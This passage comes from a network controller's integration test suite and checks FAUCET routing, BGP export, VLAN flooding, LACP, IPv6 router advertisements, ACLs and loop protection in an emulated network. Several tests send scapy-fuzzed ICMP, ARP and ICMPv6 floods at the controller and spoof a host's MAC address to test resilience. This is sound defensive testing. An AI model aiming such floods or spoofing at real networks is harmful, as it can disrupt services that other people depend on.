self.verify_ipv4_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv4_routing_mesh()
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
self.verify_traveling_dhcp_mac()
class FaucetUntaggedIPv4RouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and export to BGP."""
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(mininet_test_util.LOCALHOST)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes sent."""
self.verify_ipv4_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv4_routing_mesh()
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}),
0)
# exabgp should have received our BGP updates
updates = self.exabgp_updates(self.exabgp_log)
for route_string in (
'10.0.0.0/24 next-hop 10.0.0.254',
'10.0.1.0/24 next-hop 10.0.0.1',
'10.0.2.0/24 next-hop 10.0.0.2',
'10.0.3.0/24 next-hop 10.0.0.2'):
self.assertTrue(re.search(route_string, updates), msg=updates)
# test nexthop expired when port goes down
first_host = self.hosts_name_ordered()[0]
match, table = self.match_table(ipaddress.IPv4Network('10.0.0.1/32'))
ofmsg = None
for _ in range(5):
self.one_ipv4_controller_ping(first_host)
ofmsg = self.get_matching_flow(match, table_id=table)
if ofmsg:
break
time.sleep(1)
self.assertTrue(ofmsg, msg=match)
self.set_port_down(self.port_map['port_1'])
for _ in range(5):
if not self.get_matching_flow(match, table_id=table):
return
time.sleep(1)
self.fail('host route %s still present' % match)
class FaucetUntaggedRestBcastIPv4RouteTest(FaucetUntaggedIPv4RouteTest):
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_2)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_3)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_4)d:
native_vlan: 100
restricted_bcast_arpnd: true
"""
class FaucetUntaggedVLanUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: True
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.ping_all_when_learned()
self.assertTrue(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedNoVLanUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedPortUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
unicast_flood: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# VLAN level config to disable flooding takes precedence,
# cannot enable port-only flooding.
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedNoPortUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: True
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
unicast_flood: False
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedHostMoveTest(FaucetUntaggedTest):
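    """Test that hosts moving between ports are relearned and L2_LEARN move events are logged."""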
def test_untagged(self):
self._enable_event_log()
first_host, second_host = self.hosts_name_ordered()[0:2]
for _ in range(2):
self.retry_net_ping(hosts=(first_host, second_host))
self.ping((first_host, second_host))
for host, in_port in (
(first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])):
self.require_host_learned(host, in_port=in_port)
self.swap_host_macs(first_host, second_host)
for port in (self.port_map['port_1'], self.port_map['port_2']):
self.wait_until_matching_lines_from_file(
r'.+L2_LEARN.+"previous_port_no": %u.+' % port, self.event_log)
class FaucetUntaggedHostPermanentLearnTest(FaucetUntaggedTest):
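    """Test that permanent_learn keeps a host learned on its original port despite MAC spoofing from another port."""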
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
permanent_learn: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.ping_all_when_learned(hard_timeout=0)
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self.assertTrue(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_1']))
# 3rd host impersonates 1st, but 1st host is still OK
original_third_host_mac = third_host.MAC()
third_host.setMAC(first_host.MAC())
self.assertEqual(100.0, self.ping((second_host, third_host)))
self.assertTrue(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_1']))
self.assertFalse(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_3']))
self.retry_net_ping(hosts=(first_host, second_host))
# 3rd host stops impersonating; now everything is fine again.
third_host.setMAC(original_third_host_mac)
self.ping_all_when_learned(hard_timeout=0)
class FaucetCoprocessorTest(FaucetUntaggedTest):
N_UNTAGGED = 3
N_TAGGED = 1
CONFIG = """
interfaces:
%(port_1)d:
coprocessor: {strategy: vlan_vid}
mirror: %(port_4)d
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Inject packet into pipeline using coprocessor.
coprocessor_host, first_host, second_host, _ = self.hosts_name_ordered()
self.one_ipv4_ping(first_host, second_host.IP())
tcpdump_filter = ' and '.join((
'ether dst %s' % first_host.MAC(),
'ether src %s' % coprocessor_host.MAC(),
'icmp'))
cmds = [
lambda: coprocessor_host.cmd(
'arp -s %s %s' % (first_host.IP(), first_host.MAC())),
lambda: coprocessor_host.cmd(
'fping %s -c3 %s' % (self.FPING_ARGS_SHORT, first_host.IP())),
]
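# first_host should receive the ICMP injected via the coprocessor port
# (tcpdump must see at least one packet).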
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, cmds, timeout=5, vflags='-vv', packets=1)
self.assertFalse(self.tcpdump_rx_packets(tcpdump_txt, packets=0))
class FaucetUntaggedLoopTest(FaucetTest):
NUM_DPS = 1
N_TAGGED = 0
N_UNTAGGED = 2
LINKS_PER_HOST = 2
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
loop_protect: True
%(port_4)d:
native_vlan: 100
loop_protect: True
"""
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def total_port_bans(self):
total_bans = 0
for i in range(self.LINKS_PER_HOST * self.N_UNTAGGED):
port_labels = self.port_labels(self.port_map['port_%u' % (i + 1)])
total_bans += self.scrape_prometheus_var(
'port_learn_bans', port_labels, dpid=True, default=0)
return total_bans
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()
# Normal learning works
self.one_ipv4_ping(first_host, second_host.IP())
start_bans = self.total_port_bans()
# Create a loop between interfaces on second host - a veth pair,
# with two bridges, each connecting one leg of the pair to a host
# interface.
self.quiet_commands(second_host, (
'ip link add name veth-loop1 type veth peer name veth-loop2',
'ip link set veth-loop1 up',
'ip link set veth-loop2 up',
# TODO: tune for loop mitigation performance.
'tc qdisc add dev veth-loop1 root tbf rate 1000kbps latency 10ms burst 1000',
'tc qdisc add dev veth-loop2 root tbf rate 1000kbps latency 10ms burst 1000',
# Connect one leg of veth pair to first host interface.
'brctl addbr br-loop1',
'brctl setfd br-loop1 0',
'ip link set br-loop1 up',
'brctl addif br-loop1 veth-loop1',
'brctl addif br-loop1 %s-eth0' % second_host.name,
# Connect other leg of veth pair.
'brctl addbr br-loop2',
'brctl setfd br-loop2 0',
'ip link set br-loop2 up',
'brctl addif br-loop2 veth-loop2',
'brctl addif br-loop2 %s-eth1' % second_host.name))
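# second_host's two switch-facing interfaces are now bridged together,
# creating a loop (rate-limited by the tbf qdiscs above).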
# Flood some traffic into the loop
for _ in range(3):
first_host.cmd('fping %s -c3 10.0.0.254' % self.FPING_ARGS_SHORT)
end_bans = self.total_port_bans()
if end_bans > start_bans:
return
time.sleep(1)
self.assertGreater(end_bans, start_bans)
# Break the loop, and learning should work again
self.quiet_commands(second_host, (
'ip link set veth-loop1 down',
'ip link set veth-loop2 down',))
self.one_ipv4_ping(first_host, second_host.IP())
class FaucetUntaggedIPv4LACPTest(FaucetTest):
NUM_DPS = 1
N_TAGGED = 0
N_UNTAGGED = 2
LINKS_PER_HOST = 2
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
lacp_timeout: 3
interfaces:
%(port_1)d:
native_vlan: 100
lacp: 1
lacp_port_priority: 1
lacp_port_id: 100
%(port_2)d:
native_vlan: 100
lacp: 1
lacp_port_priority: 2
lacp_port_id: 101
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
def get_lacp_port_id(port):
port_labels = self.port_labels(port)
lacp_port_id = self.scrape_prometheus_var('lacp_port_id', port_labels, default=0)
return lacp_port_id
bond = 'bond0'
# Linux driver should have this state (0x3f/63)
#
# Actor State: 0x3f, LACP Activity, LACP Timeout, Aggregation, Synchronization, Collecting, Distributing
# .... ...1 = LACP Activity: Active
# .... ..1. = LACP Timeout: Short Timeout
# .... .1.. = Aggregation: Aggregatable
# .... 1... = Synchronization: In Sync
# ...1 .... = Collecting: Enabled
# ..1. .... = Distributing: Enabled
# .0.. .... = Defaulted: No
# 0... .... = Expired: No
# [Actor State Flags: **DCSGSA]
# FAUCET should have this state (0x3e/62)
# Actor State: 0x3e, LACP Timeout, Aggregation, Synchronization, Collecting, Distributing
# .... ...0 = LACP Activity: Passive
# .... ..1. = LACP Timeout: Short Timeout
# .... .1.. = Aggregation: Aggregatable
# .... 1... = Synchronization: In Sync
# ...1 .... = Collecting: Enabled
# ..1. .... = Distributing: Enabled
# .0.. .... = Defaulted: No
# 0... .... = Expired: No
# [Actor State Flags: **DCSGS*]
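# The two expected states differ only in bit 0 (LACP Activity):
# the Linux bond is Active (0x3f), FAUCET is Passive (0x3e).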
lag_ports = (1, 2)
synced_state_txt = r"""
Slave Interface: \S+-eth0
MII Status: up
Speed: \d+ Mbps
Duplex: full
Link Failure Count: \d+
Permanent HW addr: \S+
Slave queue ID: 0
Aggregator ID: \d+
Actor Churn State: monitoring
Partner Churn State: monitoring
Actor Churned Count: \d+
Partner Churned Count: \d+
details actor lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:99
port key: \d+
port priority: 255
port number: \d+
port state: 63
details partner lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:01
oper key: 1
port priority: 1
port number: %d
port state: 62
Slave Interface: \S+-eth1
MII Status: up
Speed: \d+ Mbps
Duplex: full
Link Failure Count: \d+
Permanent HW addr: \S+
Slave queue ID: 0
Aggregator ID: \d+
Actor Churn State: monitoring
Partner Churn State: monitoring
Actor Churned Count: \d+
Partner Churned Count: \d+
details actor lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:99
port key: \d+
port priority: 255
port number: \d+
port state: 63
details partner lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:01
oper key: 1
port priority: 2
port number: %d
port state: 62
""".strip() % tuple(get_lacp_port_id(self.port_map['port_%u' % i]) for i in lag_ports)
lacp_timeout = 5
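# port_lacp_state is scraped from Prometheus per port; this test counts a
# port as up when the exported state value is 3.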
def prom_lacp_up_ports():
lacp_up_ports = 0
for lacp_port in lag_ports:
port_labels = self.port_labels(self.port_map['port_%u' % lacp_port])
lacp_state = self.scrape_prometheus_var('port_lacp_state', port_labels, default=0)
lacp_up_ports += 1 if lacp_state == 3 else 0
return lacp_up_ports
def require_lag_up_ports(expected_up_ports):
for _ in range(lacp_timeout * 10):
if prom_lacp_up_ports() == expected_up_ports:
break
time.sleep(1)
self.assertEqual(prom_lacp_up_ports(), expected_up_ports)
def require_linux_bond_up():
for _retries in range(lacp_timeout * 2):
result = first_host.cmd('cat /proc/net/bonding/%s|sed "s/[ \t]*$//g"' % bond)
result = '\n'.join([line.rstrip() for line in result.splitlines()])
with open(os.path.join(self.tmpdir, 'bonding-state.txt'), 'w') as state_file:
state_file.write(result)
if re.search(synced_state_txt, result):
break
time.sleep(1)
self.assertTrue(
re.search(synced_state_txt, result),
msg='LACP did not synchronize: %s\n\nexpected:\n\n%s' % (
result, synced_state_txt))
# Start with ports down.
for port in lag_ports:
self.set_port_down(self.port_map['port_%u' % port])
require_lag_up_ports(0)
orig_ip = first_host.IP()
switch = self.first_switch()
bond_members = [pair[0].name for pair in first_host.connectionsTo(switch)]
# Deconfigure bond members
for bond_member in bond_members:
self.quiet_commands(first_host, (
'ip link set %s down' % bond_member,
'ip address flush dev %s' % bond_member))
# Configure bond interface
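# The bond takes over the host's original IP and uses the fixed system MAC
# 0e:00:00:00:00:99 that synced_state_txt above expects as the actor system mac address.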
self.quiet_commands(first_host, (
('ip link add %s address 0e:00:00:00:00:99 '
'type bond mode 802.3ad lacp_rate fast miimon 100') % bond,
'ip add add %s/24 dev %s' % (orig_ip, bond),
'ip link set %s up' % bond))
# Add bond members
for bond_member in bond_members:
self.quiet_commands(first_host, (
'ip link set dev %s master %s' % (bond_member, bond),))
for _flaps in range(2):
# All ports down.
for port in lag_ports:
self.set_port_down(self.port_map['port_%u' % port])
require_lag_up_ports(0)
# Pick a random port to come up.
up_port = random.choice(lag_ports)
self.set_port_up(self.port_map['port_%u' % up_port])
require_lag_up_ports(1)
# We have connectivity with only one port.
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
for port in lag_ports:
self.set_port_up(self.port_map['port_%u' % port])
# We have connectivity with two ports.
require_lag_up_ports(2)
require_linux_bond_up()
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
# Connectivity must survive that randomly chosen port going down again.
self.set_port_down(self.port_map['port_%u' % up_port])
require_lag_up_ports(1)
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
for port in lag_ports:
self.set_port_up(self.port_map['port_%u' % port])
class FaucetUntaggedIPv4LACPMismatchTest(FaucetUntaggedIPv4LACPTest):
"""Ensure remote LACP system ID mismatch is logged."""
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
orig_ip = first_host.IP()
switch = self.first_switch()
bond_members = [pair[0].name for pair in first_host.connectionsTo(switch)]
for i, bond_member in enumerate(bond_members):
bond = 'bond%u' % i
self.quiet_commands(first_host, (
'ip link set %s down' % bond_member,
'ip address flush dev %s' % bond_member,
('ip link add %s address 0e:00:00:00:00:%2.2x '
'type bond mode 802.3ad lacp_rate fast miimon 100') % (bond, i * 2 + i),
'ip add add %s/24 dev %s' % (orig_ip, bond),
'ip link set %s up' % bond,
'ip link set dev %s master %s' % (bond_member, bond)))
self.wait_until_matching_lines_from_faucet_log_files(r'.+actor system mismatch.+')
class FaucetUntaggedIPv4ControlPlaneFuzzTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_ping_fragment_controller(self):
first_host = self.hosts_name_ordered()[0]
first_host.cmd('ping -s 1476 -c 3 %s' % self.FAUCET_VIPV4.ip)
self.one_ipv4_controller_ping(first_host)
def test_fuzz_controller(self):
first_host = self.hosts_name_ordered()[0]
self.one_ipv4_controller_ping(first_host)
packets = 1000
fuzz_template = 'python3 -c \"from scapy.all import * ; scapy.all.send(%s, count=%u)\"'
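# Each command sends fuzzed ICMP echo (type 0/8) or ARP packets at the FAUCET VIP;
# the controller must still answer pings after each batch.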
for fuzz_cmd in (
fuzz_template % ('IP(dst=\'%s\')/fuzz(%s(type=0))' % (self.FAUCET_VIPV4.ip, 'ICMP'), packets),
fuzz_template % ('IP(dst=\'%s\')/fuzz(%s(type=8))' % (self.FAUCET_VIPV4.ip, 'ICMP'), packets),
fuzz_template % ('fuzz(%s(pdst=\'%s\'))' % ('ARP', self.FAUCET_VIPV4.ip), packets)):
fuzz_out = first_host.cmd(mininet_test_util.timeout_cmd(fuzz_cmd, 180))
self.assertTrue(
re.search('Sent %u packets' % packets, fuzz_out), msg='%s: %s' % (
fuzz_cmd, fuzz_out))
self.one_ipv4_controller_ping(first_host)
def test_flap_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
for _ in range(5):
self.one_ipv4_ping(first_host, second_host.IP())
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
self.flap_all_switch_ports()
class FaucetUntaggedIPv4ControlPlaneTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_fping_controller(self):
first_host = self.hosts_name_ordered()[0]
self.one_ipv4_controller_ping(first_host)
# Try 64 byte icmp packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV4)
# Try 128 byte icmp packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV4, size=128)
class FaucetUntaggedIPv6RATest(FaucetUntaggedTest):
FAUCET_MAC = "0e:00:00:00:00:99"
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fe80::1:254/64", "fc00::1:254/112", "fc00::2:254/112", "10.0.0.254/24"]
faucet_mac: "%s"
""" % FAUCET_MAC
CONFIG = """
advertise_interval: 5
""" + CONFIG_BOILER_UNTAGGED
def test_ndisc6(self):
first_host = self.hosts_name_ordered()[0]
for vip in ('fe80::1:254', 'fc00::1:254', 'fc00::2:254'):
self.assertEqual(
self.FAUCET_MAC.upper(),
first_host.cmd('ndisc6 -q %s %s' % (vip, first_host.defaultIntf())).strip())
def test_rdisc6(self):
first_host = self.hosts_name_ordered()[0]
rdisc6_results = sorted(list(set(first_host.cmd(
'rdisc6 -q %s' % first_host.defaultIntf()).splitlines())))
self.assertEqual(
['fc00::1:0/112', 'fc00::2:0/112'],
rdisc6_results)
def test_ra_advertise(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = ' and '.join((
'ether dst 33:33:00:00:00:01',
'ether src %s' % self.FAUCET_MAC,
'icmp6',
'ip6[40] == 134',
'ip6 host fe80::1:254'))
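# ip6[40] == 134 matches ICMPv6 type 134 (router advertisement).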
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [], timeout=30, vflags='-vv', packets=1)
for ra_required in (
r'ethertype IPv6 \(0x86dd\), length 142',
r'fe80::1:254 > ff02::1:.+ICMP6, router advertisement',
r'fc00::1:0/112, Flags \[onlink, auto\]',
r'fc00::2:0/112, Flags \[onlink, auto\]',
r'source link-address option \(1\), length 8 \(1\): %s' % self.FAUCET_MAC):
self.assertTrue(
re.search(ra_required, tcpdump_txt),
msg='%s: %s' % (ra_required, tcpdump_txt))
def test_rs_reply(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = ' and '.join((
'ether src %s' % self.FAUCET_MAC,
'ether dst %s' % first_host.MAC(),
'icmp6',
'ip6[40] == 134',
'ip6 host fe80::1:254'))
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd(
'rdisc6 -1 %s' % first_host.defaultIntf())],
timeout=30, vflags='-vv', packets=1)
for ra_required in (
r'fe80::1:254 > fe80::.+ICMP6, router advertisement',
r'fc00::1:0/112, Flags \[onlink, auto\]',
r'fc00::2:0/112, Flags \[onlink, auto\]',
r'source link-address option \(1\), length 8 \(1\): %s' % self.FAUCET_MAC):
self.assertTrue(
re.search(ra_required, tcpdump_txt),
msg='%s: %s (%s)' % (ra_required, tcpdump_txt, tcpdump_filter))
class FaucetUntaggedIPv6ControlPlaneFuzzTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_flap_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
for _ in range(5):
self.one_ipv6_ping(first_host, 'fc00::1:2')
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
self.flap_all_switch_ports()
def test_fuzz_controller(self):
first_host = self.hosts_name_ordered()[0]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.one_ipv6_controller_ping(first_host)
fuzz_success = False
packets = 1000
count = 0
abort = False
def note(*args):
error('%s:' % self._test_name(), *args + tuple('\n'))
# Some of these tests have been slowing down and timing out,
# so this code is intended to allow some debugging and analysis.
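# Iterate over every ICMPv6 packet class scapy exports and fuzz each one toward
# the controller VIP, with a per-class time budget of too_long seconds.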
for fuzz_class in dir(scapy.all):
if fuzz_class.startswith('ICMPv6'):
fuzz_cmd = ("from scapy.all import * ;"
"scapy.all.send(IPv6(dst='%s')/fuzz(%s()),count=%u)" %
(self.FAUCET_VIPV6.ip, fuzz_class, packets))
out, start, too_long = '', time.time(), 30 # seconds
popen = first_host.popen('python3', '-c', fuzz_cmd)
for _, line in pmonitor({first_host: popen}):
out += line
if time.time() - start > too_long:
note('stopping', fuzz_class, 'after >', too_long, 'seconds')
note('output was:', out)
popen.terminate()
abort = True
break
popen.wait()
if 'Sent %u packets' % packets in out:
count += packets
elapsed = time.time() - start
note('sent', packets, fuzz_class, 'packets in %.2fs' % elapsed)
fuzz_success = True
if abort:
break
note('successfully sent', count, 'packets')
self.assertTrue(fuzz_success)
note('pinging', first_host)
self.one_ipv6_controller_ping(first_host)
note('test_fuzz_controller() complete')
class FaucetUntaggedIPv6ControlPlaneTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_fping_controller(self):
first_host = self.hosts_name_ordered()[0]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.one_ipv6_controller_ping(first_host)
# Try 64 byte icmp6 packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV6)
# Try 128 byte icmp6 packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV6, size=128)
class FaucetTaggedAndUntaggedDiffVlanTest(FaucetTest):
N_TAGGED = 2
N_UNTAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
native_vlan: 101
%(port_4)d:
native_vlan: 101
"""
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=2, n_untagged=2, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_separate_untagged_tagged(self):
tagged_host_pair = self.hosts_name_ordered()[:2]
untagged_host_pair = self.hosts_name_ordered()[2:]
self.verify_vlan_flood_limited(
tagged_host_pair[0], tagged_host_pair[1], untagged_host_pair[0])
self.verify_vlan_flood_limited(
untagged_host_pair[0], untagged_host_pair[1], tagged_host_pair[0])
# hosts within VLANs can ping each other
self.retry_net_ping(hosts=tagged_host_pair)
self.retry_net_ping(hosts=untagged_host_pair)
# hosts cannot ping hosts in other VLANs
self.assertEqual(
100, self.ping([tagged_host_pair[0], untagged_host_pair[0]]))
class FaucetUntaggedACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetUntaggedEgressACLTest(FaucetUntaggedTest):
REQUIRES_METADATA = True
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acl_out: 1
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_port5001_blocked(self):
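# The egress ACL table ID is looked up by name from the faucet_config_table_names metric.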
egress_acl_table = self.scrape_prometheus_var(
'faucet_config_table_names',
labels={'table_name': 'egress_acl'}
)
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=egress_acl_table)
self.ping_all_when_learned()
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=egress_acl_table)
def test_port5002_notblocked(self):
egress_acl_table = self.scrape_prometheus_var(
'faucet_config_table_names',
labels={'table_name': 'egress_acl'}
)
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=egress_acl_table)
class FaucetUntaggedDPACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
dp_acls: [1]
""" + CONFIG_BOILER_UNTAGGED
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetUntaggedNoReconfACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
opstatus_reconf: False
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
matches = {
'in_port': int(self.port_map['port_1']),
'tcp_dst': 5001,
'eth_type': IPV4_ETH,
'ip_proto': 6}
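# With opstatus_reconf: False, the blocking ACL flow must stay installed even while port 1 is down.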
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
self.set_port_down(self.port_map['port_1'])
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
self.set_port_up(self.port_map['port_1'])
self.ping_all_when_learned()
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
